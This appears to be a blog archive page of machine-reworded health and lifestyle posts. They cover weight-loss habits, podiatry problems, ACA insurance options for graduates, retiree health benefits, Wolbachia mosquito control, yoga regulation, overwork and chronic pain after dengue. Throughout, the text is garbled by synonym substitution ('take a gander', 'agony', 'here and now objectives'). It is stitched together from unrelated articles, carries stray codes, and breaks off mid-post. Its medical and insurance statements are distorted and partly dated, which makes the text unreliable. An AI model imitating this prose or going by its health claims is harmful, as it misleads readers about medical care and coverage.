We as a whole have negative behavior patterns. It is practically difficult to stay away from them however winding up more mindful of them and afterward doing whatever you can to stop them is an unquestionable requirement on the off chance that you are to go on and get comes about with your exercise and nourishment program.
Many individuals don’t know about the unfortunate propensities they have until the point that it is past the point of no return. Give us a chance to take a gander at three poor works on undermining your outcomes and how you can conquer them…
1. Careless Eating. The principal negative behavior pattern to keep away from is careless eating. How frequently amid the day would you say you are eating while at the same time accomplishing something unique? Regardless of whether this is taking a gander at your telephone, sitting in front of the TV, conversing with companions, or something else?
Many individuals say they are never totally centered around the sustenance they are eating. Not focusing on your sustenance decisions is dangerous in light of the fact that before you know it, you have wrapped up your feast or nibble and haven’t the foggiest what you have eaten. At that point you are left feeling mentally unsatisfied, and you wind up eating more than you generally would.
When the time has come to eat, take a seat, eat, and concentrate on your nourishment: at that point you will probably discover you eat significantly less.
2. Making a cursory effort. Another issue is quite recently making an insincere effort at the exercise center. In the event that you are putting your exercises on autopilot, odds are you won’t see great outcomes at any point in the near future. You should be completely present in each set you perform. Concentrate on the mind-muscle compression and giving 110% focus to every rep you finish. At that point you will yield the best execution in addition to ideal weight reduction comes about. 13127	a2481
On the off chance that you feel occupied while in the rec center, it may be an ideal opportunity to manage those diversions…
3. Neglecting To Set Short-Term Goals. At long last, the last propensity to maintain a strategic distance from is neglecting to set here and now objectives. Long haul objectives are basic, however they don’t keep you steady on an everyday premise. Here and now objectives – objectives you can fulfill in possibly 14 days, will ensure you don’t skirt your exercise center exercise or eat the bit of cake you ought to maintain a strategic distance from.
They are the objectives you can see happening soon and when you contact them, give you a sentiment achievement. You would prefer not to pass up a major opportunity for that inclination. Endeavor to set a couple of here and now objectives like clockwork. It is simply the most ideal approach to keep concentrated on the end prize. 13184	b2710
There you have the propensities you have to break on the off chance that you plan to go on and see greatest accomplishment on your health improvement plan. What number of these would you say you are liable of? a2950
In spite of the fact that dealing with your sickness can be exceptionally testing, Type 2 diabetes isn’t a condition you should simply live with. You can roll out straightforward improvements to your every day routine and lower both your weight and your glucose levels. Keep it together, the more you do it, the less demanding it gets.
Author descarwarePosted on November 21, 2017 November 22, 2017 Leave a comment on Why Am I Finding It Difficult To Lose Weight?
From regular scrape ups to unending ailments, here are a few circumstances where it may be valuable to counsel a specialist.
Bunions are unattractive lumps at the huge toe’s base that are caused when the bone or joint is strange. On the off chance that left untreated, they can turn out to be increasingly aggravating and difficult, meddling with footwear and prompting more noteworthy damage. A podiatry authority can give a treatment design, for example, wrapping and cushioning, or in outrageous cases, perform surgery to evacuate the bunion.
A red toe with a considerable measure of liquid waste may show disease from an ingrown toenail, which is when part of the nail develops into the tissue of the toe. A podiatrist can give treatment, endorse anti-infection agents, and if necessary, expel a bit or the whole culpable nail. 1	3297	3798
Albeit at times treatable with over-the-counter drug, this basic contagious disease on the base of the feet as well as between the toes can turn out to be extremely bothersome and excruciating. It causes dry, textured skin and conceivably notwithstanding overflowing breaks. In the event that it declines to leave, it’s a great opportunity to see a podiatry expert. Solution creams and pills are typically successful however anti-toxins may help in specific cases.
Swelling, redness, and agony following a foot or lower leg damage are signs that there may be a sprain, extend, or tear in a tendon or muscle. See a podiatry master if following three days the agony and swelling have not diminished, and it stays hard to walk. He or she can make a cast for the specific range of the foot or leg and prompt on home care. In serious cases, the podiatrist may need to perform surgery.
Joint torment in the feet or lower legs may be caused by joint inflammation, a catch-all name for diseases that limit versatility and make negligible devastating uneasiness in the joints. Albeit most types of the malady are not reparable, a podiatrist can help with foot/lower leg joint inflammation by offering exhortation on approaches to limit the agony, augment joint development, and keep on pursueing work and diversions with as meager torment as could reasonably be expected. It’s imperative to see an expert with regards to joint inflammation. After some time, this condition can change the usefulness of the zone it influences and cause perpetual harm. 54	3840	82
Individuals with diabetes are at the highest priority on the rundown of the individuals who might profit by consistent registration with a podiatry expert. Truth be told, a yearly lower leg/foot examination is exhorted. Diabetes patients experience the ill effects of considerably higher rates of foot issues, going from troublesome dry skin to removal. The last is so basic among individuals with diabetes since they regularly have fringe blood vessel malady, which limits blood stream to the feet, and nerve harm, which limits foot feeling. Together, they’re a savage combo that permits typically innocuous wonders like ulcers to get seriously contaminated quicker and without being seen until it’s past the point of no return.
At the point when the basic undertaking of strolling is prevented by a tenacious, extraordinary agony transmitting from the base of the foot, the guilty party is as a rule a condition known as plantar fasciitis. 3609	119
It’s a typical illness, influencing an expected 2 million patients in the United States every year and it’s significantly more than basically managing a little foot torment. The torment can be sufficiently extreme to limp an individual, contrarily affecting his or her personal satisfaction, particularly on the off chance that he or she is ordinarily dynamic. It can show up in one foot or the two feet. It influences anybody, from proficient competitors like Albert Pujols (baseball), Pau Gasol (b-ball) and Antonio Gates (football), to end of the week warriors and ordinary individuals.
Plantar fasciitis happens when the plantar belt – the bow-like tissue on the base of the foot – is harmed or torn bringing about aggravation, torment and firmness. Proceeded with physical action and delayed weight bearing can bring about additional exacerbation. While harm to the plantar sash can prompt plantar fasciitis, the disease can really create without reason. There are, nonetheless, factors that can make an individual more inclined to the condition including: 4036	169
The side effects of plantar fasciitis plainly recognize it from basic foot torment. The most well-known protestation from plantar fasciitis is a consuming, puncturing, or throbbing agony in the foot rear area that goes on for around 30 days or more. It additionally includes expanded agony in the morning or after broadened times of sitting. Luckily for most sufferers, the going with firmness and agony has a tendency to slacken for the duration of the day.
There are an assortment of medicines, surgical and non-surgical, accessible to help facilitate the agony and disappointment of this exasperating foot sickness. Those medicines incorporate the utilization of calming drug, for example, ibuprofen as well as Aleve or using hand crafted orthotic gadgets, boots, props or braces that offer help for the foot.
Rest, icing and extending practices at home are likewise suggested. In the event that those strategies don’t give great outcomes and some measure of help, there are surgical choices that expel or discharge the influenced bit of the tissue in charge of the agony. A great many people will have the capacity to come back to ordinary capacity half a month after surgery.
With all the whine about the new arrangement, open enlistment period, the endowments given by government and the need to have a wellbeing spread has made new options and issues in the meantime for the new school graduates.
A portion of the decisions they make are; Mom and Dad’s arrangement, separately acquired scope, here and now scope, and so on., yet there is a radical new parcel of alternatives going ahead for them.
In what capacity will medical coverage choices of today change for graduates when the last enormous arrangements of the wellbeing change law happen from January?
Mother and Dad’s medical coverage design – A parent health care coverage design is best for you in the event that you are considering moving back to your parent’s place, and you are searching for quality scope or manager based scope isn’t accessible right now. With the assistance of the Affordable Care Act (ACA) now a man moving on from school can remain safeguarded under his parent’s medical coverage design till the age of 26. This is an extremely pleasant alternative for a portion of the graduates. In any case, there are negative sides of this, as expanded premium for the guardians, or in the event that you are not in the state then it isn’t conceivable to get the help of system specialist at the season of necessity. So these are the things that can hamper the advantages of your scope.
In 2014: You will be dealt with as a holder of a wellbeing design with your folks till the time you turn 26, yet after that you should buy your very own wellbeing front, so as to fit in the prerequisites of ACA.
Conventional individual medical coverage design – in the event that you are searching for quality scope and don’t have a choice of boss based scope right now, or you have a desire of being fiscally free, at that point you ought to go for a customary significant health care coverage get ready for yourself. A man with great wellbeing has numerous great and reasonable alternatives to pick from.You can get the best for you by getting the best data about your arrangement from an online commercial center. It is to be remembered this is conceivable to decay scope in view of previous conditions until 2014
In 2014: by the begin of 2014, the majority of the general population who are not secured under boss based protection should buy these individual protection designs. It will be something to be thankful for on the off chance that you will buy one at this point. There is a shot of you getting the advantage of appropriations in 2014. 3895
High-deductible health care coverage design – on the off chance that you are not secured under any business based health care coverage and need quality scope, however don’t have its need, as you are in a decent wellbeing conditions and are not taking any sort of therapeutic medication routinely, at that point you ought to go for a high deductible protection design. These are the customary protection designs with higher deductible. Here the significance of higher deductibles is bring down month to month premiums. A portion of the higher deductible designs can be utilized as a part of the wellbeing sparing records, by which you will get some expense preferred standpoint and sparing a lot of cash.
In 2014: At this time additionally the high-deductible designs and Health Savings Accounts will be accessible. Aside from these there will be plans accessible for everybody which are currently a days there for the general population beneath 30 years old.
Here and now medical coverage design – If all you need is the essential crisis scope, or your manager based scope isn’t sufficient for you, at that point a fleeting health care coverage will be a decent alternative for you. The transient medical coverage designs are anything but difficult to qualify and very moderate. In any case, it ought to be remembered that the transient designs don’t cover the previous conditions, preventive care or doctor prescribed medications. You can without much of a stretch buy a transient medical coverage design.
In 2014: the transient medical coverage won’t consent to the prerequisites of the wellbeing change law in 2014. So you will be liable to a duty punishment on the government charges in the event that you remain revealed from a qualifying wellbeing anticipates over 90 days.
Going uninsured – It involves worry that the vast majority of the youthful Americans are uninsured nowadays. The possibility of medical coverage sounds stupid at the time you are youthful and solid. In any case, a solitary medicinal crisis can cost to more than you can ever think with all the therapeutic costs nowadays. the achievement of the wellbeing change will be unclear without the inclusion of youthful and solid people.
In 2014: it will affect your funds on the off chance that you are uninsured in 2014. A large portion of the uninsured individuals will confront an assessment punishment of 1% of their wage or $95 (whichever is more noteworthy) and the punishment will continue expanding in the coming years.
Bristy Francis has been an authority in the field of medical coverage since 2008 advising many people and families on arrangements which might be ideal for them. 3313
Bristy is leader of [http://www.quote-monster.org], a web based shopping administration intended to enable people and families to discover moderate medical coverage cites [http://www.quote-monster.org] and plans.
All businesses have duty of controlling their representatives about the medical advantage plans offered by them. Indeed, even the workers then again additionally have the privilege to get data about the medical advantage plans offered to them. Thusly a business has the privilege to illuminate the workers about certain data with respect to the medical advantage plans. Therefore, associations have made the position of Health Benefit Manager having correspondence as one of the duties regarding medical advantage related plans and systems.
There is a plenty of data accessible for correspondence. It is the aptitude of the Health advantage Manager to exhibit them in an organized way for the benefit of the business.
– Employers need to give a definite rundown of data to the representatives about what medical advantage plans are given to them or the plan they are qualified for.
– To give and guide its workers about the status of accreditation, confirmation and additionally licensure.
– in particular give all the data in regards to the quality, security of the medical advantage design and the cost of the business supported arrangement.
As indicated by the Employer Retirement and Income Security Act of 1974, it is important to give all nitty gritty data that the representatives are qualified for that incorporates design rules, secured benefits, records about the arrangement administration and operation also. The workers are additionally qualified for get a record with the outline design depiction, known as SPD. The SPD contains
– Explanation on the cost that the arrangement takes care of and the expense that the recipient needs to pay.
There are different strategies by which the Health Benefit Manager, in the interest of the businesses, can impart medical advantage data to the representatives:
– One of the most ideal courses is to speak with the representatives about the wellbeing scope design however giving excessively data of it ought to likewise be stayed away from. The workers ought to be given the expected time to comprehend the plan and make inquiries assuming any.
– It is best to clarify the adjustments in straightforward terms to the representatives to influence them to get it.
– Apart from the representatives it is likewise important to clarify the medical advantage wants to the medical advantage chiefs with the goal that they can disclose it to the workers to.
– Employers ought to be prepared to confront any inquiries asked by workers with respect to the medical advantage plan and clear their questions.
– It is similarly vital too to be immediate and fair while talking about the scope design particularly if representatives confront cost increment because of the scope design.
– Discussing the 5C’s excessively is fundamental with the workers. This present 5C’s incorporate cost, changes in plans, scope of the arrangement, examination of the earlier year’s arrangement and furthermore the present alternative.
– It is important to give data the representatives about the medicinal services suppliers that are accessible in the amended and new arrangement alternative.
– Providing tributes of different representatives about the adjustments in medical advantage designs can likewise be very useful for the present workers.
– Taking the assistance of different means like web, up close and personal exchanges, telephonic discussions, office intranet and in addition printed materials can be useful as well. Nonetheless it is additionally important to utilize materials that are effortlessly comprehended by representatives.
– It is vital for the businesses to lead correspondence battles to instruct the workers about the need of medical advantage plans and how they work.
– The dependable administrator’s point ought to be to distinguish the target and point of the medicinal services battle.
– Setting up the criteria for assessment of the battle and furthermore how much it is getting passed on among the workers.
– To execute and the battle and ensure that the representatives comprehend message that is being passed on by the business.
– It is likewise important to ensure that the workers additionally to address the instruction need of the representatives with dialect hindrance, proficiency issues and so forth. 3776
Boss based retirement social insurance protection benefits keep on declining, as per late industry reports.
Numerous retirees have possessed the capacity to depend on private or state business based retirement medical advantages for supplemental medicinal services scope while on Medicare before, yet this is ending up less normal.
Manager based wellbeing related advantages can give vital scope to the holes that exist in Medicare programs. Extra scope advantages can lighten the cost-sharing necessities and deductibles related with Medicare. Tops on the sum that can be spent out-of-take, frequently connected with supplemental scope, are additionally regularly accommodating for retirees.
By and large, supplemental retiree wellbeing and health advantages supported by a private or metropolitan manager have helped numerous retirees adapt to high restorative expenses frequently brought about in retirement. HE2026	3741
The Kaiser Family Foundation as of late detailed, in any case, that the quantity of vast private managers considered businesses with at least 200 workers offering retiree social insurance benefits has dropped from 66 percent in 1988 to 23 percent in 2015.
Organizations that do keep on offering retiree medical advantages have been rolling out improvements went for diminishing the cost of advantages, including:
State bosses have likewise not been invulnerable to the pattern, but rather the sort and level of scope being offered by most states is fundamentally not quite the same as retirement social insurance scope being offered by extensive organizations.
Dissimilar to numerous private bosses, state governments keep on offering some level of retiree human services advantages to help pull in and hold skilled laborers, as indicated by a report titled “State Retiree Health Plan Spending,” distributed by The Pew Charitable Trusts and the John D. what’s more, Catherine T. MacArthur Foundation in May, 2016.
Except for Idaho, all states as of now offer recently contracted state workers some level of retirement human services benefits as a major aspect of their advantages bundle, as per the report. Of the states offering retiree health advantages, 38 have influenced the responsibility regarding add to wellbeing to administer to the scope being advertised. State managers are, be that as it may, likewise rolling out improvements to the retirement social insurance protection benefits they give to state laborers. HE1943	3408
Noteworthy among these progressions for the states is no less than one main thrust the Governmental Accounting Standards Board (GASB) now expects states to report liabilities for retirement benefits other than annuities in their money related proclamations. The progressions were required from all states before the finish of 2008. Thus, the expanded monetary straightforwardness constrained states to survey the cost of their other post-work benefits (OPEB) and deliver how they intend to pay for them.
Since retirement medicinal services benefits represent most of the states’ OPEB commitments, many states have rolled out strategy improvements to address the up and coming commitments. Factors, for example, date of contract, date of retirement or vesting qualification, including least age and least administration year necessities, are presently being utilized by states to differ or restrict retirement medicinal services benefits.
Generally speaking, from 2010 to 2013, the states saw their OPEB liabilities diminish by 10 percent from $627 billion after expansion changes. While this may sound opposing, the decreases are credited to a lull in the development of human services costs combined with advantage alterations went for cost diminishments.
To take a gander at one state for instance, California’s current spending plan uncovered that medicinal services benefits for retirees are costing the state more than $2 billion a year for a 80 percent expansion over the earlier 10 years. In spite of the fact that the circumstance as of late changed, California was already one of 18 expresses that had nothing put aside to cover its future retiree medicinal services advantage expenses of $80.3 billion.
It ought to be noticed that retiree medicinal services designs are commonly supported by design supports on a “pay as you go” premise, implying that monies to pay present and future human services commitments are taken from current resources and not put aside ahead of time. This varies altogether from benefits designs represented by ERISA, which are liable to financing rules.
Because of California’s unfunded OPEB obligation, workers and the state are currently paying into a store for future retiree medicinal services advantage costs. The state is likewise coordinating $88 million in representative commitments and paying an extra $240 million to prefund future retirement social insurance advantage costs. The progressions are affecting retirees and in addition state and private managers. HE1874	3811
By and large, boss based retirement medicinal services benefits, once vital for supplementing Medicare for resigned seniors, keep on declining.
Many children of post war America who are right now secured by retiree medicinal plans and plan to depend on future boss paid health advantages, are probably going to be disillusioned to discover that these advantage designs can be changed or ended. ERISA-administered advantage designs commonly contain a “reservation of rights” arrangement permitting the arrangement support to change or end all or parts of the arrangement. Numerous private and state businesses are diminishing or ending retiree medical advantages because of the expanding expense of protection premiums, rising medicinal services expenses, and increments in life span.
Since the mid 1990s there have been many situations where sudden changes to post-business annuity and health advantages have brought about claims. Ordinarily, the key issue is the reservation of rights dialect as well as aggregate haggling understanding dialect for workers who were secured by a union contract which referenced retiree health advantages.
Recipients who have inquiries regarding their retiree health advantages ought to talk with their arrangement support to find out about the particular advantages accessible to them and have an alternate course of action for crossing over their restorative scope to Medicare, on the off chance that they are thinking about early retirement or need to better comprehend future advantages.
Check Johnson, Ph.D., J.D., is a profoundly experienced ERISA master. As a previous ERISA Plan Managing Director and plan trustee for a Fortune 500 organization, HE1734	3732
Author descarwarePosted on November 16, 2017 Leave a comment on Making advantage programs through private medical coverage trades
The World Health Organization not long ago called for huge scale pilot investigations of the Wolbachia mosquito-control technique and the Pan-American Health Organization offered specialized help in nations influenced by Zika.
The thought rose up out of the Grand Challenges program supported by the Gates Foundation, which every year calls for researchers to offer for reserves with imaginative new plans to explain a portion of the world’s most squeezing medical issues. Prof Scott O’Neill’s group from Monash University proposed Wolbachia disease of mosquitoes to stop dengue transmission in 2005.HE2042
Jeremy Farrar, executive of the Wellcome Trust, told the Guardian it was imperative for the researchers to guarantee they had nearby help for what will in any case be a trial. “Group contribution is totally basic,” he said. A tremendous measure of work, over years, had gone ahead to disclose the task to individuals living in regions where prior trials had occurred. “Get that kind of group intercession wrong and you never recuperate from that,” he said.
There are extraordinary trusts in Wolbachia yet it is too early to assume this is the response to the Zika and dengue scourges. Farrar said he would hold up to see whether it worked. “I’m in equipoise. I truly trust it will, yet I’d get a kick out of the chance to see the confirmation at scale.”
Sue Desmond-Hellmann, CEO of the Bill and Melinda Gates Foundation, in London with Farrar for the most recent Grand Challenges meeting where new tasks are displayed and financing granted, said she concurred. HE1987
“What I feel most sure about is that it is protected,” she said. “We realize that Wolbachia is now found in 60% of the world’s bugs. Everybody in this room has most likely been nibbled by something with Wolbachia.”
Aedes aegyti mosquitoes are found crosswise over substantial territories of the world, including the southern piece of the United States, parts of Asia and Africa. Strategies to control the populaces or point of confinement the harm they can do in transmitting viral diseases are critically required. The chief of the US Centers for Disease Control and Prevention said on Tuesday that there was not yet an approach to contain the spread of contaminations.
“Zika and different ailments spread by [the Aedes aegypti mosquito] are truly not controllable with current advancements,” said Thomas Frieden. “We will see this end up noticeably endemic in the half of the globe.”
More than 50 nations have encountered a flare-up of Zika infection contaminations since 2015, as indicated by WHO information, and there have been almost 2,200 instances of microcephaly – babies with mind harm – related with Zika, 28 of which have been accounted for in the US. Most by far – 2,033 – were accounted for in Brazil. HE1932
This week started with the famous tempest in a teacup as the British open were cautioned we were in threat from … yoga. On Radio 4’s Today program on Monday, the British Wheel of Yoga’s seat, Paul Fox, guaranteed that educators without adequate preparing are giving yoga classes. What has since risen is that the British Wheel, one of the wealthiest yoga associations in the UK, has consented to give Skills Active, a quango, with subsidizing to build up a National Occupational Standard for Yoga – to secure and keep every one of us safe in down puppy.
As I tuned in the Radio 4 studio, unmistakably this distortion of what is going on in most yoga classes is a guise for a sort of neocolonialism. At the point when intense associations look for control, they generally say it’s to “ensure people in general” and “guard them”. Are these not the cases advanced by any gathering looking to force its power and undermine every single other gathering existing close by it? A meta-examination of concentrates on yoga by Dr Holger Cramer of the University of Duisburg-Essen affirms that it is as protected as other physical development disciplines.
In the times of the British Raj, when Britain’s economy relied upon wares, for example, cotton, Indian cotton producers were constrained on torment of detainment to offer their cotton respects Britain at costs controlled by the purchaser. The crude cotton was sent back here, to our “otherworldly plants”, and Indians – who had been weaving cotton for a considerable length of time – were then disallowed from weaving their own and compelled to purchase woven cotton back at costs dictated by Britain. That wouldn’t occur today – okay? HE1896
The craftsmanship and exploration of yoga, which started in India, has turned out to be enormous business everywhere throughout the world. As indicated by Ibisworld, in the UK alone Yoga is worth about £790m a year. In any case, yoga keeps on being the antiquated way of Hindu otherworldliness, and its first how-to manual, called the Katha Upanishad, goes back in the vicinity of 2,000 and 3,000 years, and structures some portion of holy Hindu writings. In it a young fellow experiences Death and an exchange between them follows. Demise is gotten some information about the significance of life and offers yoga as a method for understanding it all. A National Occupational Standard expels this profound association and replays the cotton trap: giving the British blessing to a specific brand of yoga and afterward – under the pretense of wellbeing and security – offering it back to the instructors who are as of now showing it.
The monetary punishment for not going along is an expense that will hit independently employed educators, the greater part of whom are ladies
Obviously, yoga instructors, similar to all educators, dependably need to enhance their preparation, however this proposition is only a method for paying an administration to guarantee a two-level framework: a few instructors get the stamp and others don’t. It won’t enhance the preparation, however it will make it considerably more costly and farthest point who can bear the cost of it. The money related punishment for not going along is an assessment that will hit independently employed educators, the greater part of whom are ladies. A superior utilization of assets may have been to fund explore into precisely what regions of further preparing are required.
Various years back yoga educators shaped the Independent Yoga Network to guarantee that instructors applying to get on to the Register of Exercise Professionals had a worthy level of preparing. The IYN attempted this with no money related remuneration and in help of the decent variety of yoga schools.
While yoga is a piece of their religion for over a billion people, it isn’t so for every one of those rehearsing it in the UK. Many individuals do yoga for a feeling of prosperity – for hurting backs, or muscle strain from a constrained week, or only a break from an every minute of every day plan. None of us needs to change our religion – or even have one – to appreciate the advantages it offers. In any case, nor should anybody endeavor to misuse and rethink another’s religion keeping in mind the end goal to appreciate a greater cut of yoga’s budgetary pie.
Is yoga perilous? Totally! This is what it improved the situation me: I was a youthful mum experiencing devastating postnatal despondency that separated me from life when I experienced yoga. It changed all that and showed me, since I expected to learn it once more, how to end up noticeably a completely partaking person. Getting to be noticeably drawn in dependably makes us hazardous – we progress toward becoming participators as opposed to just onlookers – and we see plainly when the cotton is being pulled over our eyes. HE1745
Mounting weights at work are taking an overwhelming toll on life at home. Representatives say their supervisors need them to put work before family, and many are relied upon to be accessible if the need arises all day and all night. More than one out of four say they work longer hours than they need to, we gain from the most recent YouGov survey.
It’s not a pretty picture: an economy where large amounts of stress and nervousness are ordinary, where individuals get sick since they’ve lost control of their opportunity, where relational unions are harmed and kids endure. But then, it’s a photo we’re welcome to cheer. Our political pioneers venerate “strivers” and “dedicated individuals”, not “relaxed, mindful fathers”, for instance. The more drawn out and harder we work, the more praiseworthy we should be.
I am mature enough to recall noon. At the point when my workmates and I went out to a close-by eaterie for no less than 60 minutes, jeered a legitimate supper and presumably a glass of wine. Nowadays, as most working drones, I remain at my work area with my fork and Tupperware pot, nose stuck to the screen. Furthermore, I’ve turned out to be so entranced by the cutting edge working society that I’d be very stunned to discover a partner feasting out at noon. No alcohol, no breaks, no recess.
It appears somewhat odd when we hear such a great amount about mechanization and “the finish of work”. On the off chance that the robots are coming, why are we surged off our feet? Truth be told, it’s all piece of a similar picture.
All the primary UK political gatherings demand that the main effective economy is one that develops, ideally quicker than different economies. Development calls for more noteworthy efficiency: getting more yield per unit of info. The framework is avaricious for more assets, however laborers and machines need to support less. More proficient procedures (counting more robots) lessen the measure of human info required. So the individuals who have occupations must work harder – and longer hours – to cling to what they have and to keep the economy developing. HE1734
In the mean time, since robots can’t do everything yet, there are new whirlwinds of low-end occupations with zero-hours contracts, offending pay and no security. This class has been known as the “precariat” and quite a bit of it blossoms with the over-hecticness of different specialists. It ships individuals home during the evening (Uber), conveys fast food (Deliveroo) and fixes things around the house (TaskRabbit). Numerous tricky laborers need to do a few occupations just to bring home the bacon. So they are under substantial weights as well, regularly torn amongst neediness and an unfortunate work-life adjust
Author descarwarePosted on October 24, 2017 Leave a comment on Representations of families with babies incapacitated by Zika infection
In 2013, I gotten an infection that I thought was this season’s flu virus. It wound up being dengue, some of the time alluded to as “breakbone fever”. The epithet is a reference to the levels of torment a few people encounter when they are in dengue’s throes. I anticipated that my side effects would die down once the dynamic contamination left. All things considered, companions who contracted dengue, in some cases various years in succession, appeared to come back to a feeling of commonality. Rather, the joint agony stayed, beneath the fever pitch of “breaking bones” yet no place close to my old self. For quite a while I sat tight for that “old self” to emerge, and for the agony to subside. It took three years to at last surrender to my present and concede that the agony wasn’t going anyplace. HE1501	HE1602
“Agony is a message to the mind that something isn’t right,” Anna Altman wrote in an overwhelming piece about dealing with her own particular torment and headaches. “Right up ’til the present time I monitor a concealed expectation that I will get another determination, one that plainly clarifies the seriousness of my side effects.”
Like Anna, I don’t have an authoritative answer about what to call the total of torment that has taken up living arrangement. In any case, I do have a thought of how it arrived.
I got dengue in Vietnam, while as of now having celiac infection. It hung out, and wreaked assist devastation on my insusceptible framework. Specialists have presented that the dengue activated post-viral exhaustion, which could possibly leave. It likewise skilled me with Raynaud’s sickness, a turmoil of the little veins that diminishes blood stream.
At the point when presented to icy, my veins go into fits, which causes torment, deadness, throbbing and shivering. When I touch frosty nourishment or I am in chilly climate, my hands and feet turn white, at that point blue. I had a go at making meatballs this mid year, yet needed to stop since touching the ground meat was painful to the point that I remained in the kitchen in tears. HE1522	HE1623
To add to the rundown, I appear to have lost my fingerprints. I discovered this out while applying for a visa. In the wake of setting my hands on the advanced unique mark peruser, the majority of my fingers had monster red Xs on them. “Goodness!” said the man perusing the outputs. “You have no fingerprints!” Excuse me? I found a recent report noticing that some celiacs have unique finger impression decay, however mine were certainly in place pre-dengue. A riddle. Jokes about my going out and looting banks proliferate, don’t stress.
Lastly, the most weakening thing after the joint torment itself has been the weariness. A profound, ceaseless bone exhaustion that influences basic things to appear like obstructions. What’s more, an eager rest that does not give rest from the cloudiness of weariness.
The mix of unending torment, dissemination issues and weariness joined to pack my versatility and made it hard to see the backwoods through the trees. Inwardly, it felt like little differences posed a potential threat. I got myself more responsive than some time recently, thinking about things all the more literally. HE1542	HE1643
Rather than confronting my days with resolve, I began twisting into myself, avoiding interruptions that may influence things to hurt more. I began dreading the following shoe that could drop, and thinking about whether I would have the capacity to adapt. Uneasiness can be eminently damaging, yet when joined with perpetual torment it progresses toward becoming deadening. Agonizing over whether you can withstand more agony is a substantial concern. Be that as it may, as I in the end made sense of, it just serves to exacerbate the situation.
On the off chance that you have an endless disease or a handicap that keeps you from doing what you used to have the capacity to do, entire regions of control may go up in smoke. Also, if your condition causes you physical agony that has not reacted well to restorative treatment, the misery you may feel can be exacerbated by passionate turmoil caused by realizing that your condition is by all accounts past even your specialist’s control.
My misery was exacerbated by the way that I looked solid, despite the fact that I was in torment constantly. “You appear to be incredible!” companions would state, witnessing a photograph on Facebook. Some would instruct me to take supplements, or to simply “think positive” about the torment and carry on with my life as I used to. They implied well, obviously. In any case, the remarks uncover a pretentiousness about longer-term torment that different companions with “undetectable ailments” battle with moreover. It’s as though individuals anticipated that us would will it away. On the off chance that exclusive we had pondered being more positive! How senseless of us.
The Spoon Theory clarifies the impacts of imperceptible agony with extremely viable symbolism. You just have a specific measure of “spoons” in a day, and you utilize them to do things that the vast majority don’t mull over. Since for you, being in steady torment, even basic things require spoons. So all that you do, each choice you make about endeavor exercises, it accompanies the learning that there’s a spoon-like open door cost. What’s more, in the event that you go through every one of your spoons that day, that is it. You can’t do anything besides rest, since you are so drained.
The issue is that for the vast majority, torment is transitory. When it turns into a full-time flat mate, the things that used to help – setting off to the exercise center to work through it, climbing a mountain and communing with nature, heading off to a show – move toward becoming dangers rather than pleasurable encounters. What’s more, for some, that sort of supported propping is past examination.
Regardless of the difficulties throughout my life, be it somebody who wager me I couldn’t get into graduate school or alternate ailments on my ventures, I have constantly discovered a route around. This time felt unique, in light of the fact that the torment was progressing and frustratingly hazy.
This word, untranslatable in English, is the thing that I have battled against these last years. A contemplative yearning for something that may stay away forever. After so long, looking for a response to “settle” the agony was not making a difference. I just moved in the direction of recuperating once I constrained that profound, damaging sentimentality crazy.
In her long, mindful piece about her little girl Carmen’s MS travel, Maria Bustillos met a specialist named George Jelinek. Dr Jelinek alluded to the contrast amongst “recuperating” and “curing”, with the focal message that it truly matters to play a more dynamic part being taken care of by our own particular bodies. Eventually, on the off chance that you escape everyone’s notice of the therapeutic framework, or on the off chance that you neglect to get a finding that has clear, noteworthy treatment, you need to take some control back for your own feeling of self and wellbeing. HE1584	HE1685
Being urged to deal with herself improved things greatly to Carmen, and to us. We weren’t sticking around for the following awful thing to happen; we were cooperating in a steady and progressively cheerful perspective.
Without finding an answer for quit feeling torment, I discovered expectation in having the capacity to reframe my mentality toward the torment. This included currently developing a feeling of self-sympathy, acknowledgment and appreciation. These are on the whole words that pre-travel Jodi would have investigated and feigned exacerbation until the end of time.
Just tolerating what is unmanageable and not attempting to control what you can’t change is a stamped move from my old state of mind. It is likewise specifically in struggle with the way I was brought up in western culture. “Surrender and simply acknowledge that things suck? Are you joking?” But it is the main way that I have possessed the capacity to turn things around. By concentrating on my advance (or scarcity in that department), I was making a troublesome circumstance more untenable. Presently, I praise the little advances I have begun to take as opposed to battling for greater objectives.
Rachel, a peruser of mine who contracted dengue and intestinal sickness in the meantime, has battled with issues of perpetual torment and weariness. Her voyage reflected mine, with the exception of that she could see a torment pro in her nation of origin. She and I have backpedaled and forward about our encounters, and our individual endeavors to discover euphoria in an existence that is currently unique for each of us. For her, as well, it has implied tolerating the torment and not battling against it. She has additionally effectively searched out what brings her satisfaction. “I needed to attempt and search for delight and appreciation notwithstanding when I didn’t feel it,” she composed. “This wound up noticeably reflexive, and to some degree programmed.”
Like me, Rachel wasn’t raised to search out appreciation minute to minute. However, she excessively found that concentrating on it, regardless of the possibility that things hurt, helped shape the blueprint of her recuperating.
The most critical, most troublesome, most on a very basic level disappointing thing is this: you just need to acknowledge this is your world, and advance from that point. Notwithstanding while pushing ahead has a craving for creeping on the floor, a millimeter at any given moment. Notwithstanding when advance feels tricky, and you can’t twist your hands in the morning. The main thing you can do is watch over yourself and endeavor to discover arrangements that work for the body you’ve been given. HE1703
I would like to include that I have explored different avenues regarding a variety of eating routine based changes, supplements and treatments. I have been tried for irritation markers in the blood (fortunately they’re low), and thyroid issue, and numerous different things. While I value those disclosing to me that I should attempt x and y thing that will mystically settle it, with all due regard, I have attempted a significant number of those things.
The torment is here, and it might be staying put. Whatever I can do is cut out my own euphoria inside it, and acknowledge that it is presently a piece of my identity.
1. Day by day reflection: I ponder both morning and night, and keeping in mind that there are times where I feel impervious to the training, I can’t deny that it has a major effect. Reflection has helped tolerating what my body is feeling minute.
Author descarwarePosted on October 20, 2017 October 20, 2017 Leave a comment on How I figured out how to adapt to incessant agony
However, as time has gone on, the emphasis on the cushioned – so frequently to the point where it has all the earmarks of being given equivalent charging to more critical and troubling issues influencing ladies – has incensed me, and different women’s activists scholars, to an ever increasing extent. Maybe it is on the grounds that I have been in this amusement for some time now, and have hence observed similar points reused a few times over with next to no new being said (my companion and associate Emer O’Toole composed the conclusive piece on female body hair quite a long while prior – what could be left to say in regards to it?). Or, on the other hand maybe it is on account of I have grown up a touch in the previous five years. However, more than both of those two things, I would reason this is a period when the requirement for women’s liberation is making itself intensely evident in all way of ways. There is so almost no to chuckle about, to the point where even the thought of a “flexibility foof” neglects to raise a grin. HE633	HE729	HE825
